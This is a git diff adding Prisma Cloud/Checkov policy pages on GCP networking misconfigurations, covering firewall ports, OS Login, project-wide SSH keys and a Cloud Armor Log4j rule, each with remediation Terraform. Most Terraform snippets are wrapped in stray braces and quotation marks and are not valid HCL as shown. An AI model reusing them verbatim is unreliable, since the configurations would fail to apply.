network to replace it: `gcloud compute networks create & lt;network name>` + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project +* *Arguments:* auto_create_network + + +[source,go] +---- +resource "google_project" "my_project" { + name = "My Project" + project_id = "your-project-id" + org_id = "1234567" ++ auto_create_network = false +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-8.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-8.adoc new file mode 100644 index 000000000..4754bf78f --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-8.adoc @@ -0,0 +1,99 @@ +== GCP VM instances do have block project-wide SSH keys feature disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 34acea4f-dacf-477d-9d96-3dcc9f29ed41 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py[CKV_GCP_32] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Project-wide SSH keys are stored in Compute/Project-meta-data. +Project wide SSH keys can be used to login into all instances within a project. +Using project-wide SSH keys eases SSH key management. +If SSH keys are compromised, the potential security risk can impact all instances within a project. +We recommend you use Instance specific SSH keys instead of common/shared project-wide SSH key(s), to limit the attack surface should the SSH keys be compromised. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/instances [VM instances]. + +. List all the instances in your project. + +. Click the name of the Impacted instance. + +. Click * Edit* in the toolbar. + +. Under * SSH Keys*, navigate to * Block project-wide SSH keys **. + +. To block users with project-wide SSH keys from connecting to this instance, select * Block project-wide SSH keys*. + +. At the bottom of the page, click * Save*. ++ +Repeat these steps for each impacted Instance. + + +* CLI Command* + + +To block project-wide public SSH keys, set the metadata value to TRUE using the following command: +---- +gcloud compute instances add-metadata INSTANCE_NAME +--metadata block-projectssh-keys=TRUE +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Field:* metadata +* *Arguments:* block-project-ssh-keys + + +[source,go] +---- +{ + "resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + metadata = { ++ block-project-ssh-keys = true + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-9.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-9.adoc new file mode 100644 index 000000000..2536a53a9 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-9.adoc @@ -0,0 +1,122 @@ +== GCP Projects do have OS Login disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 01eae80a-f04f-4fe2-a5ad-00a414f89c5e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py[CKV_GCP_33] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling OSLogin ensures that SSH keys used to connect to instances are mapped with IAM users. +Revoking access to IAM user will revoke all the SSH keys associated with that particular user. +It facilitates centralized and automated SSH key pair management. +This is useful in handling cases such as response to compromised SSH key pairs and/or revocation of external/third-party/Vendor users. +We recommend you enable OSLogin to bind SSH certificates to IAM users and facilitates effective SSH certificate management. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/metadata [Metadata]. + +. Click * Edit*. + +. Add a metadata entry where the key is * enable-oslogin* and the value is * TRUE*. + +. To apply changes, click * Save*. + +. For every instances that overrides the project setting, go to the * VM Instances* page at https://console.cloud.google.com/compute/instances. + +. Click the name of the instance on which you want to remove the metadata value. + +. To edit the instance settings go to the top of the instance details page and click * Edit*. + +. Under * Custom metadata*, remove any entry with key * enable-oslogin* and the value is * FALSE*. + +. To apply your changes to the instance, navigate to the bottom of the instance details page and click * Save*. + + +* CLI Command* + + + +. Configure oslogin on the project using the following command: + +---- +gcloud compute project-info add-metadata --metadata enable-oslogin=TRUE +---- + +. Remove instance metadata that overrides the project setting, using the following command: + +---- +gcloud compute instances remove-metadata INSTANCE_NAME --keys=enable-oslogin +---- + +Optionally, you can enable two factor authentication for OS login. +For more information, see https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_project_metadata +* *Arguments:* enable-oslogin +* *Resource:* google_compute_instance +* *Arguments:* enable-oslogin Should not override project metadata: should not be set to false. + + +[source,go] +---- +{ + "//Option 1 +resource "google_compute_project_metadata" "default" { + metadata = { ++ enable-oslogin = true + } + +} + +//Option 2 +resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk {} + metadata = { +- enable-oslogin = false + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-cloud-armor-prevents-message-lookup-in-log4j2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-cloud-armor-prevents-message-lookup-in-log4j2.adoc new file mode 100644 index 000000000..8a38b90c2 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-cloud-armor-prevents-message-lookup-in-log4j2.adoc @@ -0,0 +1,65 @@ +== GCP Cloud Armor policy not configured with cve-canary rule + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3045acbb-395c-45a0-980b-7e9e605ceaa5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py[CKV_GCP_73] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Using a vulnerable version of Apache Log4j library might enable attackers to exploit a Lookup mechanism that supports making requests using special syntax in a format string which can potentially lead to a risky code execution, data leakage and more. +Set your Cloud Armor to prevent executing such mechanism using the rule definition below. +Learn more around https://nvd.nist.gov/vuln/detail/CVE-2021-44228[CVE-2021-44228] + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_security_policy + + +[source,go] +---- +{ + "resource "google_compute_security_policy" "example" { + name = "example" + + rule { + action = "deny(403)" + priority = 1 + match { + expr { + expression = "evaluatePreconfiguredExpr('cve-canary')" + } + + } + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-cloud-function-http-trigger-is-secured.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-cloud-function-http-trigger-is-secured.adoc new file mode 100644 index 000000000..7645cc95e --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-cloud-function-http-trigger-is-secured.adoc @@ -0,0 +1,66 @@ +== GCP Cloud Function HTTP trigger is not secured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4eab897c-f9a8-439d-b3d5-ac48f5d827e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml[CKV2_GCP_10 ] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies GCP Cloud Functions for which the HTTP trigger is not secured. +When you configure HTTP functions to be triggered only with HTTPS, user requests will be redirected to use the HTTPS protocol, which is more secure. +It is recommended to set the 'Require HTTPS' for configuring HTTP triggers while deploying your function. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_cloudfunctions_function" "pass" { + name = "function-test" + description = "My function" + runtime = "nodejs16" + + available_memory_mb = 128 + source_archive_bucket = google_storage_bucket.bucket.name + source_archive_object = google_storage_bucket_object.archive.name + trigger_http = true + https_trigger_security_level = "SECURE_ALWAYS" + timeout = 60 + entry_point = "helloGET" + labels = { + my-label = "my-label-value" + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access.adoc new file mode 100644 index 000000000..0a9034302 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access.adoc @@ -0,0 +1,61 @@ +== GCP Firewall rule allows all traffic on MySQL DB port (3306) + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1171a9b9-9648-405a-8e03-83e5025e81d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py[CKV_GCP_88] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +It is a best practice to ensure that your firewall ingress rules do not allow unrestricted access to your MySQL database, as it can increase the risk of unauthorized access or attacks on your database. +By restricting access to only specific IP addresses or ranges that you trust, you can help secure your database from potential threats. +Additionally, you can use tools like SSL/TLS to encrypt the connection between your database and client, which can help protect against interception of sensitive data. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_compute_firewall" "restricted" { + name = "example" + network = "google_compute_network.vpc.name" + + allow { + protocol = "tcp" + ports = ["3306"] + } + + + source_ranges = ["172.1.2.3/32"] +} + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-firewall-rule-does-not-allows-all-traffic-on-mysql-port-3306.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-firewall-rule-does-not-allows-all-traffic-on-mysql-port-3306.adoc new file mode 100644 index 000000000..e11a1b76c --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-firewall-rule-does-not-allows-all-traffic-on-mysql-port-3306.adoc @@ -0,0 +1,98 @@ +== GCP Firewall rule allows all traffic on MySQL DB port (3306) + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1171a9b9-9648-405a-8e03-83e5025e81d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py[CKV_GCP_88] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Firewall rules setup fine grained allow/deny traffic policies to and from a virtual machine (VM). +Enabled rules are always enforced and help protect instances from unwanted traffic. +Firewall rules are defined at the network level, and only apply to the network where they are created. +While firewall rules are defined at the network level, connections are allowed or denied on a per-instance basis. +Additionally, it is possible to create firewall rules that allow ingress traffic from any source on the internet. +This firewall rule may be useful for troubleshooting but can inadvertently allow malicious or unwanted access to your instances. +One such insecure firewall rule is for MySQL databases running on port TCP 3306. +We recommend you restrict or remove the the `0.0.0.0/0` MySQL firewall rule when you no longer need it. + +//// +=== Fix - Runtime + + +* GCP Console* + + +To remove your `0.0.0.0/0` MySQL firewall rule: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/networking/firewalls/list [Firewall]. + +. In the * Firewall rules in this project* section, use the * Filter* option and search for `Filter:0.0.0.0/0`. ++ +This filter returns all public firewall rules. + +. Select your public MySQL (TCP port 3306) firewall rule and then select * DELETE*. + + +* CLI Command* + + +To delete your public MySQL firewall rule execute the following command: + +[,sh] +---- +gcloud compute firewall-rules delete FIREWALL-NAME +---- + +Replace * FIREWALL-NAME* with your target MySQL firewall rule name. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_firewall +* *Field:* source_ranges + + +[source,go] +---- +{ + "resource "google_compute_firewall" "mysql-example" { + name = "mysql-example" + network = google_compute_network.default.name + allow { + protocol = "tcp" + ports = ["3306"] + } + +- source_ranges = ["0.0.0.0/0"] +}", + + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-gcr-container-vulnerability-scanning-is-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-gcr-container-vulnerability-scanning-is-enabled.adoc new file mode 100644 index 000000000..8664d0ecc --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-gcr-container-vulnerability-scanning-is-enabled.adoc @@ -0,0 +1,56 @@ +== GCP GCR Container Vulnerability Scanning is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0367679b-7384-4d67-9673-22e6ba99719e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml[CKV2_GCP_11 ] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies GCP accounts where GCR Container Vulnerability Scanning is not enabled. +GCR Container Analysis and other third party products allow images stored in GCR to be scanned for known vulnerabilities. +Vulnerabilities in software packages can be exploited by hackers or malicious users to obtain unauthorized access to local cloud resources. +It is recommended to enable vulnerability scanning for images stored in Google Container Registry. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_project_services" "pass_1" { + project = "your-project-id" + services = ["iam.googleapis.com", "cloudresourcemanager.googleapis.com", "containerscanning.googleapis.com"] +} + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-ftp-port-20-access.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-ftp-port-20-access.adoc new file mode 100644 index 000000000..202e443d8 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-ftp-port-20-access.adoc @@ -0,0 +1,60 @@ +== GCP Google compute firewall ingress allow FTP port (20) access + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f7eab932-e3bb-47aa-82d1-104f22fe1581 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py[CKV_GCP_77] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +It is a best practice to ensure that your firewall ingress rules do not allow unrestricted access to FTP port 20, as it can increase the risk of unauthorized access or attacks on your network. +FTP (File Transfer Protocol) is a widely used protocol for transferring files between computers, but it can also be a potential security risk if not properly configured. +By restricting access to only specific IP addresses or ranges that you trust, you can help secure your network from potential threats. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_compute_firewall" "restricted" { + name = "example" + network = "google_compute_network.vpc.name" + + allow { + protocol = "tcp" + ports = ["20"] + } + + + source_ranges = ["172.1.2.3/32"] + target_tags = ["ftp"] +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports.adoc new file mode 100644 index 000000000..c23a5f54f --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports.adoc @@ -0,0 +1,61 @@ +== GCP Firewall with Inbound rule overly permissive to All Traffic + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ff6a9cca-8bc5-4a72-9235-ec7b65c547d5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml[CKV2_GCP_12 ] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies GCP Firewall rules which allows inbound traffic on all protocols from public internet. +Doing so, may allow a bad actor to brute force their way into the system and potentially get access to the entire network. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "# pass +resource "google_compute_firewall" "compute-firewall-ok-1" { + name = "compute-firewall-ok-1" + network = google_compute_network.example.name + + deny { + protocol = "all" + } + + source_ranges = ["0.0.0.0/0"] + disabled = false +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access.adoc new file mode 100644 index 000000000..4a0129861 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access.adoc @@ -0,0 +1,62 @@ +== GCP Firewall rule allows all traffic on FTP port (21) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fab6a8ee-dc82-49f0-8c2c-a2a5c7666539 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py[CKV_GCP_75] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "# pass + +resource "google_compute_firewall" "restricted" { + name = "example" + network = "google_compute_network.vpc.name" + + allow { + protocol = "tcp" + ports = ["21"] + } + + + source_ranges = ["172.1.2.3/32"] + target_tags = ["ftp"] +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access.adoc new file mode 100644 index 000000000..ba8dba808 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access.adoc @@ -0,0 +1,62 @@ +== GCP Firewall rule allows all traffic on HTTP port (80) + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9f6d22f9-873a-4a71-91a8-41a82e4c9314 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py[CKV_GCP_106] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +You should also consider restricting access to HTTP port 80 to only the IP addresses or ranges that need it. +This can help reduce the risk of your network being accessed by unauthorized users or devices, and can also help reduce the risk of attacks such as denial of service (DoS) or distributed denial of service (DDoS) attacks. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + " +resource "google_compute_firewall" "restricted" { + name = "example" + network = "google_compute_network.vpc.name" + + allow { + protocol = "tcp" + ports = ["80"] + } + + + source_ranges = ["172.1.2.3/32"] + target_tags = ["ssh"] +} + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc new file mode 100644 index 000000000..2cee3ea71 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc @@ -0,0 +1,63 @@ +== GCP VPC Network subnets have Private Google access disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ec842076-78f1-4c9c-86dc-e1c0e00f6150 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py[CKV_GCP_76] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling Private Google Access for IPv6 can help improve the security of your Google Cloud Platform (GCP) resources by allowing them to access Google APIs and services over IPv6 networks, rather than over the public internet. +This can help reduce the risk of your traffic being intercepted or tampered with, as it is routed through Google's private network. +Additionally, Private Google Access can help improve the performance and reliability of your GCP resources by reducing network latency and eliminating the need to route traffic through third-party networks. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + " +resource "google_compute_subnetwork" "pass_bidi" { + name = "log-test-subnetwork" + ip_cidr_range = "10.2.0.0/16" + stack_type = "IPV4_IPV6" + ipv6_access_type = "EXTERNAL" + region = "us-central1" + network = google_compute_network.custom-test.id + # purpose="INTERNAL_HTTPS_LOAD_BALANCER" if set ignored + # log_config { + # metadata="EXCLUDE_ALL_METADATA" + # } + private_ip_google_access = true + private_ipv6_google_access = "ENABLE_BIDIRECTIONAL_ACCESS_TO_GOOGLE" +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-legacy-networks-do-not-exist-for-a-project.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-legacy-networks-do-not-exist-for-a-project.adoc new file mode 100644 index 000000000..61b4c4064 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-legacy-networks-do-not-exist-for-a-project.adoc @@ -0,0 +1,66 @@ +== GCP project is configured with legacy network + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fa5df1d7-40d6-4629-a1a8-a7a6758d4a55 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml[CKV2_GCP_2] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +In order to prevent use of legacy networks, a project should not have a legacy network configured. +Legacy networks have a single network IPv4 prefix range and a single gateway IP address for the whole network. +The network is global in scope and spans all cloud regions. +Subnetworks cannot be created in a legacy network and are unable to switch from legacy to auto or custom subnet networks. +Legacy networks can have an impact for high network traffic projects and are subject to a single point of contention or failure. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project +* *Arguments:* google_compute_network + + +[source,go] +---- +{ + "resource "google_project" "bad_project" { + name = "My Project" + project_id = "bad" + org_id = "1234567" +} + + +resource "google_compute_network" "vpc_network_bad" { + name = "vpc-legacy" +- auto_create_subnetworks = true + project = google_project.bad_project.id +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/google-cloud-networking-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/google-cloud-networking-policies.adoc new file mode 100644 index 000000000..dfce77111 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/google-cloud-networking-policies.adoc @@ -0,0 +1,124 @@ +== Google Cloud Networking Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-networking-1.adoc[GCP Firewall rule allows all traffic on SSH port (22)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py[CKV_GCP_2] +|HIGH + + +|xref:bc-gcp-networking-10.adoc[GCP Projects have OS Login disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py[CKV_GCP_34] +|MEDIUM + + +|xref:bc-gcp-networking-11.adoc[GCP VM instances have serial port access enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py[CKV_GCP_35] +|MEDIUM + + +|xref:bc-gcp-networking-12.adoc[GCP VM instances have IP Forwarding enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py[CKV_GCP_36] +|MEDIUM + + +|xref:bc-gcp-networking-2.adoc[GCP Firewall rule allows all traffic on RDP port (3389)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py[CKV_GCP_3] +|HIGH + + +|xref:bc-gcp-networking-3.adoc[GCP HTTPS Load balancer is set with SSL policy having TLS version 1.1 or lower] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py[CKV_GCP_4] +|MEDIUM + + +|xref:bc-gcp-networking-4.adoc[GCP SQL database is publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py[CKV_GCP_11] +|HIGH + + +|xref:bc-gcp-networking-5.adoc[GCP Cloud DNS has DNSSEC disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py[CKV_GCP_16] +|MEDIUM + + +|xref:bc-gcp-networking-6.adoc[RSASHA1 is used for Zone-Signing and Key-Signing Keys in Cloud DNS DNSSEC] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py[CKV_GCP_17] +|MEDIUM + + +|xref:bc-gcp-networking-7.adoc[GCP Kubernetes Engine Clusters using the default network] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py[CKV_GCP_27] +|MEDIUM + + +|xref:bc-gcp-networking-8.adoc[GCP VM instances do have block project-wide SSH keys feature disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py[CKV_GCP_32] +|HIGH + + +|xref:bc-gcp-networking-9.adoc[GCP Projects do have OS Login disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py[CKV_GCP_33] +|HIGH + + +|xref:ensure-cloud-armor-prevents-message-lookup-in-log4j2.adoc[GCP Cloud Armor policy not configured with cve-canary rule] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py[CKV_GCP_73] +|MEDIUM + + +|xref:ensure-gcp-cloud-function-http-trigger-is-secured.adoc[GCP Cloud Function HTTP trigger is not secured] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml[CKV2_GCP_10 ] +|MEDIUM + + +|xref:ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access.adoc[GCP Firewall rule allows all traffic on MySQL DB port (3306)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py[CKV_GCP_88] +|LOW + + +|xref:ensure-gcp-firewall-rule-does-not-allows-all-traffic-on-mysql-port-3306.adoc[GCP Firewall rule allows all traffic on MySQL DB port (3306)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py[CKV_GCP_88] +|LOW + + +|xref:ensure-gcp-gcr-container-vulnerability-scanning-is-enabled.adoc[GCP GCR Container Vulnerability Scanning is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml[CKV2_GCP_11 ] +|MEDIUM + + +|xref:ensure-gcp-google-compute-firewall-ingress-does-not-allow-ftp-port-20-access.adoc[GCP Google compute firewall ingress allow FTP port (20) access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py[CKV_GCP_77] +|LOW + + +|xref:ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports.adoc[GCP Firewall with Inbound rule overly permissive to All Traffic] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml[CKV2_GCP_12 ] +|HIGH + + +|xref:ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access.adoc[GCP Firewall rule allows all traffic on FTP port (21)] +| 